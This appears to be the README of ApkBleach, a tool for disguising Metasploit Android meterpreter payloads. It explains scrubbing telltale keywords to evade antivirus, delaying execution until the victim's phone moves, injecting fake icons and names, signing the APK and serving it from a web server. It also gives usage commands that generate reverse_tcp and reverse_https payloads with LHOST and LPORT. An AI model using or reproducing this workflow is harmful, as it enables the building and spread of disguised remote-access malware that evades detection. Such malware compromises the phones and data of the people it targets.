ApkBleach was developed specifically to obfuscate android payloads generated by the metasploit-framework in attempts to evade detection. The obfuscation that takes place attempts to evade detection with two main methods. The first method is strictly for screening of the decompiled payload. By default metasploit generates a android application littered with the keywords metasploit and payload. Replacing those keywords with random strings and randomizing file names is good first step in obfuscating the typical metasploit android payload. The next method is to change the way the payload is executed. The default payload generated by metasploit executes on create or simply put as soon as the application is opened.
This obfuscation method uses the devices accelerometer activity to launch the payload. So the apkbleach payload will wait for physical movement of the target device before executing the payload.
This software also automates the process of changing the app icon, changing the app name, signing the apk, aligning the apk and installing or upgrading apktool.
New Deployment UI feature
Features
- User interface for deployment of payloads
- Line by line permissions editing. The software will go through each permission in the manifest and ask if you want to delete it.
- Stealth option. This executes the payload off the devices accelerometer instead of on open. This option also allows you to choose how many sessions you want spawned of exploit.
- Custom icon injection. This allows users to modify the app icon that appears on the home screen of a android device. You can choose from a icon apkbleach provides or you can supply your own. Apkbleach will do all the work for you.
- Renames the application to the name you put chose as the ouput file
- Scrubs the entire application of any mentions of the name “metasploit” , “stage” or “payload”. There are a lot by the way. sending security testing with an app that contains the name metasploit is just funny 🙂
- Adds padnops to PAYLOAD
- Signs apk with jarsigner. msfenom produces unsigned apps
- Zip aligns apk
- Apktool upgrade feature. If the software detects youre using apktool version 2.4.1-dirty which is Kali’s package maintainers version it will ask if you want to replace it with the lates version frfom ibot peaches. This is a good idea because it conflicts with the msfvenom -x option and throws a version number error. Not to mention the problems it has given users in the past.
Usage
apkbleach -g android/meterpreter/reverse_https LHOST=Address LPORT=port -s 3 -i BLEACH_settings --edit-permissions -o /var/www/html/payload.apk
apkbleach -g android/meterpreter/reverse_tcp LHOST=address LPORT=port -s 3 --edit-permissions --deploy-all
apkbleach --list-payloads
apkbleach --list-icons
apkbleach --clear-cacheoptional arguments:
-h, --help show this help message and exit
-g [PAYLOAD] [LHOST] [LPORT]
Generates a payload
-s [number of sessions to spawn 1-5]
Executes payload on accelerometer activity instead of on open
-i [BLEACH_icon..] or [path/to/custom/icon]
Injects an icon
-o [output/path/for/file.apk]
Path to output apk
--edit-permissions Enables permission editing in apk's manifest
--deploy-all Deploys each available icon as a payload with the apache2 server with a web interface
--list-payloads List available icons
--list-icons List available icons
--clear-cache Allows prompt whether to keep package maintainers version apktool
Install
Install instructions:
After cloning or downloading the repository cd into the apkbleach directory and run run install.sh
cd apkbleach
bash install.sh
or
cd apkbleach
chmod +x install.sh
./install.shDemo Video
ApkBleach (this link opens in a new window) by graylagx2 (this link opens in a new window)
Android Payload obfuscation and icon injection tool